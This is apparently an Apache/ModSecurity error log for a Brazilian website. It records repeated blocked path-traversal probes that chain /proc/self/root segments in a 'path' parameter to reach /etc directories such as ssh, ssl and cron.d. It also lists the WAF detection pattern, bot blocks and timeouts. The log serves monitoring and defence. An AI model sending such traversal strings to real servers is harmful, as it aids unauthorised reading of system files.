[Thu Mar 19 03:16:32.259059 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:41464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUwMdf6f5d65gmYZQ0ugAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:16:34.605779 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:41468] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUwuyqAr6etmhZHNomEQAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:16:36.720643 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:41476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUxOyqAr6etmhZHNomFAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:16:38.604593 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:43616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUxta6ubjKNq_cu4b-ngAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:16:42.760006 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.244.43:33074] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuUyuyqAr6etmhZHNomGQAAAFU"]
[Thu Mar 19 03:16:46.121830 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35946] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:16:53.812005 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:43626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuU1eoXxyEfFpUF8f_TgwAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:16:58.713463 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:35144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuU2eyqAr6etmhZHNomOwAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:17:00.018789 2026] [:error] [pid 19093:tid 140411624429312] [client 74.7.241.31:60766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuU3F_V7PWP6ixUYl59sgAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:17:07.297213 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.241.31:60778] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuU4wbLMZ6AikZjR9Ue_gAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:17:10.069928 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36496] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:17:11.694859 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.241.31:46350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuU5wbLMZ6AikZjR9UfAAAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:17:15.622657 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.241.31:46356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuU6wbLMZ6AikZjR9UfBAAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:17:21.996485 2026] [mime_magic:error] [pid 27293:tid 140411540502272] (70014)End of file found: [client 57.141.18.23:38916] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:17:35.134262 2026] [proxy_fcgi:error] [pid 27293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37174] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:17:40.375550 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.241.31:55716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVBP-YZRR_7pZ7nDJPSwAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:18:00.133908 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37824] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:18:21.842896 2026] [core:alert] [pid 31803:tid 140411666392832] [client 74.7.241.31:56052] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run
[Thu Mar 19 03:18:25.133787 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38398] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:18:27.553938 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:60010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVM_u8EFLIOrSqIptfTwAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:18:29.303651 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:33718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVNQkwaGbbGflqUZB04AAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:18:29.909611 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:60010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVNfu8EFLIOrSqIptfUQAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:18:31.486702 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:36084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVN8df6f5d65gmYZQ1AAAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:18:36.575238 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:36088] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVPOoXxyEfFpUF8f_TrgAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:18:42.381238 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.243.128:43320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVQv-YZRR_7pZ7nDJPZgAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:18:55.238777 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:41934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVTwbLMZ6AikZjR9UfMQAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:18:56.121782 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39056] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:19:18.532234 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.241.31:41680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVZhkFeYa1D6dYQnCuvQAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:19:30.109042 2026] [proxy_fcgi:error] [pid 27403:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39876] AH01075: Error dispatching request to : (polling)
